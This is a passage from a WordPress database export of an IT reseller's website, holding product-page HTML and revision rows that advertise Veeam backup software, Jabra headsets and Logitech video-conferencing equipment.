veeam-component__component-spacing-below--ss\">\r\n<div></div>\r\n</div>\r\n<div>\r\n<h4>Availability solutions that fit your business needs and budget</h4>\r\n<h4><strong>Small Business</strong></h4>\r\n<strong>Veeam Backup Essentials</strong>\r\n<ul>\r\n 	<li>Manage the ever-increasing backup complexity of your small business (250 employees or less)</li>\r\n 	<li>Save up to 60% for the same enterprise-level functionality and scalability</li>\r\n 	<li>Get Hyper-Availability for ALL of your workloads â€” virtual, physical and cloud</li>\r\n</ul>\r\n<h4><strong>Medium Enterprise</strong></h4>\r\n<strong>Veeam Backup &amp; Replication</strong>\r\n<ul>\r\n 	<li>Manage ALL virtual, physical, and cloud-based workloads from a single console</li>\r\n 	<li>Restore entire VMs, individual files and everything in between</li>\r\n 	<li>View and recover application items from backups or replicas without needing to restore the whole a virtual machine</li>\r\n</ul>\r\n<h4><strong>Large Enterprise</strong></h4>\r\n<strong>Veeam Availability Suite</strong>\r\n<ul>\r\n 	<li>Take control of your entire virtual, physical and cloud backup environment</li>\r\n 	<li>Achieve disaster recovery of any IT service and related applications and data within seconds and minutes</li>\r\n 	<li>Respond proactively to potential problems with real-time monitoring, reports and alerts</li>\r\n</ul>\r\n</div>\r\n</div>','Veeam','','inherit','closed','closed','','1608-revision-v1','','','2018-12-12 17:12:49','2018-12-12 09:12:49','',1608,'https://bintara.com.my/blog/2018/12/12/1608-revision-v1/',0,'revision','',0),(1983,1,'2018-12-12 19:51:12','2018-12-12 11:51:12','.project-3-column .project-item { width: 10.6% ; }','onepress','','inherit','closed','closed','','1980-revision-v1','','','2018-12-12 19:51:12','2018-12-12 11:51:12','',1980,'https://bintara.com.my/blog/2018/12/12/1980-revision-v1/',0,'revision','',0),(1985,1,'2018-12-12 19:52:12','2018-12-12 11:52:12','.project-3-column .project-item { width: 8.6% ; }','onepress','','inherit','closed','closed','','1980-revision-v1','','','2018-12-12 19:52:12','2018-12-12 11:52:12','',1980,'https://bintara.com.my/blog/2018/12/12/1980-revision-v1/',0,'revision','',0),(2865,1,'2019-02-07 16:45:04','2019-02-07 08:45:04','<h2>Jabra.</h2><h3>Sound thatâ€™s engineered for you</h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.</p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.</p><h2>Jabra Evolve Series</h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office</h3>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg 585w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Better concentration, greater productivity</h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.</p><ul><li>World-class speakers to deliver amazing sound for calls and music.</li><li>Call-management features allow for incredible ease-of-use..</li><li>Compatible with all leading UC platforms.</li></ul><h3>Jabra Evolve 65t</h3><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png\" alt=\"\" />											\n		<h3>Jabra Evolve 80</h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 75e</h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation â€“ but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\" alt=\"\" />											\n		<h3>Jabra Evolve 75</h3><p>Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise â€“ and need mobility around the workspace. Move up to 100ft/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 65 Stereo / Mono</h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\" alt=\"\" />											\n		<h3>Jabra Evolve 40 Stereo / Mono</h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 30 Stereo / Mono</h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_30_.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" />											\n		<h3>Jabra Evolve 20 Stereo / Mono</h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p>','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2019-02-07 16:45:04','2019-02-07 08:45:04','',1532,'https://bintara.com.my/blog/2019/02/07/1532-revision-v1/',0,'revision','',0),(1988,1,'2018-12-12 20:17:12','2018-12-12 12:17:12','.project-3-column .project-item { width: 12.6% ; }','onepress','','inherit','closed','closed','','1980-revision-v1','','','2018-12-12 20:17:12','2018-12-12 12:17:12','',1980,'https://bintara.com.my/blog/2018/12/12/1980-revision-v1/',0,'revision','',0),(1990,1,'2018-12-12 20:18:21','2018-12-12 12:18:21','.project-3-column .project-item { width: 16.8% ; }','onepress','','inherit','closed','closed','','1980-revision-v1','','','2018-12-12 20:18:21','2018-12-12 12:18:21','',1980,'https://bintara.com.my/blog/2018/12/12/1980-revision-v1/',0,'revision','',0),(1992,1,'2018-12-12 20:18:51','2018-12-12 12:18:51','.project-4-column .project-item { width: 16.8% ; }','onepress','','inherit','closed','closed','','1980-revision-v1','','','2018-12-12 20:18:51','2018-12-12 12:18:51','',1980,'https://bintara.com.my/blog/2018/12/12/1980-revision-v1/',0,'revision','',0),(1994,1,'2018-12-12 20:19:11','2018-12-12 12:19:11','.project-4-column .project-item { width: 10.8% ; }','onepress','','inherit','closed','closed','','1980-revision-v1','','','2018-12-12 20:19:11','2018-12-12 12:19:11','',1980,'https://bintara.com.my/blog/2018/12/12/1980-revision-v1/',0,'revision','',0),(1997,1,'2018-12-12 20:20:13','2018-12-12 12:20:13','.project-4-column .project-item { width: 14.8% ; }','onepress','','inherit','closed','closed','','1980-revision-v1','','','2018-12-12 20:20:13','2018-12-12 12:20:13','',1980,'https://bintara.com.my/blog/2018/12/12/1980-revision-v1/',0,'revision','',0),(1999,1,'2018-12-12 20:58:33','2018-12-12 12:58:33','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech VIDEO CONFERENCING</h1>\r\nLogitech has your video conference needs covered with HD webcams, video conference systems, and headsets.\r\n\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<h2 style=\"text-align: center;\">CONFERENCE CAMERAS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>\r\n\r\n<table border=\"0px\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1242 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n<p style=\"text-align: center;\"><strong>Logitech Group</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1249 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n<p style=\"text-align: center;\"><strong>Logitech Rally</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-1316 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /><strong>Logitech MeetUp</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1318 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech Connect</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech BCC950</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1321 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech PTZ Pro 2</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">VC ROOM SOLUTIONS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>\r\n<img class=\"wp-image-1327 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong><span class=\"product-name\">SMARTDOCK</span></strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">WEBCAMS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1332 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech Brio</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"aligncenter wp-image-1334 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech C9230e</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1336 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech C925e</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">Â <img class=\"wp-image-1354 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech B525</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">HEADSETS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>\r\n<img class=\"wp-image-1364 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">VIDEO COLLABORATION ACCESSORIES</h2>\r\n&nbsp;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1386\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\"><strong><span class=\"product-name\">SmartDock Extender Box</span></strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1391\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\"><strong>Screen Share</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1392\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\"><strong>Group Expansion Mics</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1397\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\">Logitech SmartDock Flex</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1401\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\">Group 15m Extended Cable</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\">Group 10m Extended Cable</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\"><img class=\"aligncenter wp-image-1406 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\">MeetUp Expansion Mic</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"3\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2018-12-12 20:58:33','2018-12-12 12:58:33','',16,'https://bintara.com.my/blog/2018/12/12/16-revision-v1/',0,'revision','',0),(2884,1,'2019-02-13 16:41:31','0000-00-00 00:00:00','','Elementor #2884','','draft','closed','closed','','','','','2019-02-13 16:41:31','2019-02-13 08:41:31','',0,'https://bintara.com.my/?page_id=2884',0,'page','',0),(2885,1,'2019-02-13 16:43:18','2019-02-13 08:43:18','<h3>Rally Camera</h3>\r\nPremium PTZ camera with Ultra-HD imaging system and automatic camera control.\r\n<ul>\r\n 	<li>RightSenseâ„¢ technology automates a better user experience</li>\r\n 	<li>Advanced optics frame every participant with amazing clarity</li>\r\n 	<li>Sleek industrial design for any professional meeting space</li>\r\n</ul>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png\" sizes=\"(max-width: 300px) 100vw, 300px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png 500w\" alt=\"\" width=\"300\" height=\"262\" />\r\n<h3>Peerless Performance. Exceptional Versatility.</h3>\r\nWith premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from LogitechÂ®. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan/Tilt/Zoom, razor-sharp 15X HD zoom, expansive 90Â° field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.\r\n\r\nhttps://youtu.be/TWRoAslIm0c\r\n<h3>STUDIO-QUALITY VIDEO</h3>\r\nWith an Ultra-HD imaging system, Rally Camera delivers brilliantly sharp video, outstanding colour, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLightâ„¢ technology optimises light balance to emphasise faces and render natural-looking skin tones, even in dim or backlit conditions.\r\n<h3>SLEEK INDUSTRIAL DESIGN</h3>\r\nRally Camera incorporates world-class Logitech optics and 4K sensor in a premium industrial design suitable for any professional setting. Elegantly finished in matte black with slate gray metal trim, Rally Camera can be positioned on a table, mounted on a tripod, or secured to a wall with included hardware. For overhead installations, the camera detects when itâ€™s inverted and automatically corrects image orientation and camera controls.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h3>SEE EVERYONE, PERFECTLY FRAMED</h3>\r\nLogitech RightSightâ„¢ camera control automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.\r\n\r\nFuture Availability: RightSight will be enabled by a software download, with initial support for Windows 10.\r\n\r\nhttps://youtu.be/-xGIqpPOyXs\r\n<h3>ENHANCED USER EXPERIENCE</h3>\r\nLogitech RightSenseâ„¢ is a suite of proactive technologies built into Rally Camera that automate a better user experience. RightSightâ„¢ automates camera control to perfectly frame participants, no matter their distance from the lens. RightLightâ„¢ optimises light balance and prioritises faces over objects and surfaces to render natural-looking skin tones. Plus, Rally Camera is compatible with virtually any video conferencing app right out of the box.\r\n<h3>PRIVACY ASSURANCE</h3>\r\nWhen Rally Camera is not in use, the lens defaults to a parked position where the lens is pointed straight down. This provides visual affirmation that the camera is unable to â€œseeâ€ anything in the meeting space when idle. The lens lifts to a preset position when joining a meeting and parks automatically when the meeting ends. In addition, whenever video is muted during a meeting, a status light illuminates red to affirm visual privacy.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n\r\n[maxbutton id=\"3\" ]','Logitech Rally Camera','','publish','closed','closed','','logitech-rally-camera','','','2019-03-04 15:00:24','2019-03-04 07:00:24','',0,'https://bintara.com.my/?page_id=2885',0,'page','',0),(2000,1,'2018-12-12 21:01:07','2018-12-12 13:01:07','<h3>GROUP</h3><p>Affordable video conferencing for mid to large-sized meeting rooms</p><ul><li>See every detail with HD video and 10x zoom</li><li>Works with your meeting and video conferencing applications</li><li>Crystal-clear audio for up to 20 participants</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/vOMW9wEaoqo<h3>PERFECT FOR LARGER ROOMS</h3><p>GROUP, our video conferencing solution for rooms that seat 14â€“20 people, delivers high quality HD video and crystal clear audio, allowing any meeting place to be a video collaboration space. With advanced features like acoustic echo cancellation, noise reduction technology, and intuitive controls, itâ€™s easier than ever to include everyone in the conversation.</p><h3>PLUG-AND-PLAY SIMPLICITY</h3><p>USB plug-and-play connectivity makes GROUP a breeze to deploy and use. Simply connect GROUP the conference room computer or your laptop through USB, and youâ€™re good to go. Use GROUP with any video conferencing software, including those you already use. For great-sounding audio calls, pair your mobile device with BluetoothÂ® wireless technology to the GROUP speakerphone.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>HIGH-DEFINITION VIDEO</h3><p>Bring meetings into focus with GROUPâ€™s premium lens, 10x lossless zoom, and HD 1080p/30 performance. Perfectly frame presenters and whiteboards with pan/tilt control, and zoom in for detail and clarity. GROUPâ€™s 90Â° field-of-view provides ideal coverage for medium and large conference rooms, with motorized pan and tilt for wall-to-wall, floor-to-ceiling coverage.</p><h3>NATURAL-SOUNDING AUDIO</h3><p>Everyone hears and can be heard with GROUPâ€™s full-duplex speakerphone, which delivers sound thatâ€™s crisp, clear, and highly intelligible. Acoustic echo cancellation and noise reduction technology make conversations natural-sounding while reducing reverberation and ambient noise.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>SPEAKERPHONE WITH BLUETOOTH</h4><p>Hear and be heard with life-like clarity. GROUPâ€™s full-duplex speakerphone provides 360Â° coverage with four omnidirectional mics. Beamforming technology helps pick up speech throughout a 6m / 20 ft diameter while reducing keyboard clicks and other audible distractions. You can even pair GROUP with your smartphone or tablet to enjoy outstanding audio clarity and ample volume with mobile applications and conference calls.</p><h4>CERTIFIED FOR BUSINESS</h4><p>GROUP offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business, Microsoft CortanaÂ®, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with GROUP.</p><h4>CONVENIENT CONTROLS</h4><p>GROUPâ€™s speakerphone provides a convenient dock for the handheld remote control, and features an LCD status screen and tactile buttons to mute audio, adjust volume, move the camera, and more.</p><h4>AVAILABLE EXPANSION MICS</h4><p>Extend the range of the GROUP video conferencing system with Logitech GROUP Expansion Mics. Accommodate up to 20 people in one large room and make sure everyoneâ€™s voice can be heard. Simply plug the microphones into the GROUP speakerphone: they are automatically recognized and configured. An indicator light shows when the microphone is muted, when a call is active, and when Bluetooth wireless pairing has begun.</p><h4>MUTE WITH CONFIDENCE</h4><p>With tactile mute buttons on the speakerphone, handheld remote, and optional expansion mics, GROUP makes it easy to assure your privacy. When muted, GROUPâ€™s LED status ring lights up red, a subtle yet obvious assurance thatâ€™s easily seen throughout the room.</p><h4>CABLING MADE EASY</h4><p>GROUPâ€™s compact Hub simplifies cabling and makes it easy to run cables under tables and through conduit. Integrated data and power means that the camera and speakerphone each connect with a single cable. The included 5m / 16 ft cables give you lots of placement options, while optional extended cables offer double or triple the reach.</p><h4>FIELD UPGRADEABLE</h4><p>With regular firmware updates, Logitech continuously improves the GROUP video conferencing experience. For example, recent updates delivered substantial improvements to automatic echo cancellation and gain control, plus upgraded beamforming and duplex performance. Itâ€™s another reason why Logitech delivers the best value proposition in the industry.</p><p>[maxbutton id=\"3\" ]</p>','LOGITECH GROUP','','publish','closed','closed','','logitech-group','','','2019-02-14 15:01:38','2019-02-14 07:01:38','',0,'https://bintara.com.my/?page_id=2000',0,'page','',0),(2001,1,'2018-12-12 21:01:07','2018-12-12 13:01:07','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech GROUP</h1>\r\n<p class=\"product-details\">Affordable video conferencing for mid to large-sized meeting rooms</p>\r\n\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<ul class=\"top-features \">\r\n 	<li class=\"top-feature\">See every detail with HD video and 10x zoom</li>\r\n 	<li class=\"top-feature\">Works with your meeting and video conferencing applications</li>\r\n 	<li class=\"top-feature\">Crystal-clear audio for up to 20 participants</li>\r\n</ul>\r\n</div>','Logitech GROUP','','inherit','closed','closed','','2000-revision-v1','','','2018-12-12 21:01:07','2018-12-12 13:01:07','',2000,'https://bintara.com.my/blog/2018/12/12/2000-revision-v1/',0,'revision','',0),(2003,1,'2018-12-12 21:04:17','2018-12-12 13:04:17','Looking for a video conferencing solution for your business?\r\n\r\nChoose video conferencing solution that best fits your needs.\r\n\r\n&nbsp;','Video Conferencing Solutions','','publish','closed','closed','','video-conferencing-solutions','','','2018-12-17 09:21:42','2018-12-17 01:21:42','',0,'https://bintara.com.my/?page_id=2003',0,'page','',0),(2004,1,'2018-12-12 21:04:17','2018-12-12 13:04:17','','Video Conferencing Solutions','','inherit','closed','closed','','2003-revision-v1','','','2018-12-12 21:04:17','2018-12-12 13:04:17','',2003,'https://bintara.com.my/blog/2018/12/12/2003-revision-v1/',0,'revision','',0),(2006,1,'2018-12-12 21:06:40','2018-12-12 13:06:40','Looking for a video conferencing solution for your business?','Video Conferencing Solutions','','inherit','closed','closed','','2003-revision-v1','','','2018-12-12 21:06:40','2018-12-12 13:06:40','',2003,'https://bintara.com.my/blog/2018/12/12/2003-revision-v1/',0,'revision','',0),(2007,1,'2018-12-12 21:07:19','2018-12-12 13:07:19','Looking for a video conferencing solution for your business?\r\n\r\nChoose video conferencing solution that best fits your needs.','Video Conferencing Solutions','','inherit','closed','closed','','2003-revision-v1','','','2018-12-12 21:07:19','2018-12-12 13:07:19','',2003,'https://bintara.com.my/blog/2018/12/12/2003-revision-v1/',0,'revision','',0),(2008,1,'2018-12-12 22:24:27','2018-12-12 14:24:27','<h3 class=\"section-header__subheadline\">Our easy-to-use technology allows you to actually have fun presenting. And our fully interactive features ensure you keep attendees glued to their screen.</h3>\r\nGoToWebinar erases the headache and hassle from webinars. No matter your goal or skill level, youâ€™ll quickly see why so many love GoToWebinar. Go from preparing a webinar to presenting in fewer steps â€“ and have a 